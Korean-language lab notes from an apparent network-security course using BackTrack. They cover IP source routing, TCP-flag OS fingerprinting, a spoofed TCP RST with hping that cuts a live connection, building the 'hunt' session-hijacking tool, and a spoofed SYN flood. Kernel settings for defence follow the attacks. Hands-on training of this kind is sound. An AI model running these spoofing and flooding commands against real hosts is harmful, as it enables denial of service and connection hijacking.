cf. windows source route parameter 변경
http://support.microsoft.com/default.asp?seid=kb,EN-US;217336
regedit.exe
-> HKEY_LOCAL_MACHINE/system/Current ControlSet/Services/tcpip/parameters
-새로만들기-
value: DisableIPSourceRouting
type : DWORD
value : 0 -> enable source routing
1 -> disable source routing when ip forwarding is also enable
2 -> disable source routing complete
tcp option value 를 이용한 OS fingerprinting
# tcpdump -vvv tcp[13]=18
#nc www.sun.com 80
www.oracle.com 80
www.microsoft.com 80
==========================================================================
/etc/init.d/networking start ( BT 네트워크 카드 수동으로 시작해줘야된다. )
==========================================================================
실습 1: ┏━━━┓ ┏━━━┓ ┏━━━┓ ┏━━━┓
┃ ┃ ┃ ┃ ┃ ┃ ┃ ┃
┃ B T ┃━━ ┃Linux1┃ ━━ ┃Linux2┃ ━━ ┃WinXP ┃
┃ ┃ ┃ ┃ ┃ ┃ ┃ ┃
┗━━━┛ ┗━━━┛ ┗━━━┛ ┗━━━┛
┳ ┳
BT 컴퓨터에서 실행
1) # echo 1 > /proc/sys/net/ipv4/conf/eth0/accept_source_route
# echo 1 > /proc/sys/net/ipv4/conf/all/accept_source_route
# sing [ Linux1 I P ] % [ Linux2 I P ] % [ WinXP I P ] <-- strict
# sing [ Linux1 I P ] @ [ Linux2 I P ] @ [ WinXP I P ] <-- loose
※ 패킷 분석기로 패킷을 분석해보면 (┳ 부분에 설치) 옵션부분을 까봤을시에
패킷에 STRICT LOOSE 부분이 들어있는것을 확인할수 있다.
==========================================================================
BT : # tcpdump -S tcp port 3000
# echo 1 > /proc/sys/net/ipv4/ip_forward
NOS(NIC 2개이상이면 => ipforwarding)
NIC 1개 => 강제로 up ( /etc/init.d/networking start <-- 실행 해야 네트웍카드 올라옴)
Attacker : # nc -l -p 3000
victim : # nc A-ip 3000
hello
root@bt:~# hping -a 192.168.102.20 -s 1037 192.168.102.10 -p 3000 -M 886078656 -L 838299680 -R -c 1
아이피 위장해서 rst 값을 보내서 양쪽의 통신을 끈는다.
==========================================================================
==========================================================================
www.packetstormsecurity.org
search --> hunt
# hunt-1.5.tgz ver. download
# tar vxfz hunt-1.5.tgz
# cd hunt-1.5
# make
같은네트워크에서만 가능 !! 연습해볼것
==========================================
진둔 (중국에서 만든 디도스 방어 제품) 국내에서 인정받음
- Syn Flooding -
1) win -> LinuX 정상적으로 서비스 진행되는지 여부 확인
LinuX : #while [ 1 ]
> do
> netstat -ant
> sleep 1
> done
# tcpdump -S port 23
해 두고
공격자(BT)
hping [target ip] -a [spoof id] -p 23 -S -i u1000
다시 win -> LinuX 정상적으로 서비스 진행되는지 여부 확인
case 1 ) 지연된 후 연결
2 ) 접속불가
방어는?
1) # cat /proc/sys/net/ipv4/tcp_max_syn_backlog
# echo 1024 > /proc/sys/net/ipv4/tcp_max_syn_backlog
2) # cat /proc/sys/net/ipv4/tcp_syn_cookies
# echo 1 > proc/sys/net/ipv4/tcp_syn_cookies
http://solatech/tistory 에 윈도우용 방어기술 있는 자료가 있음.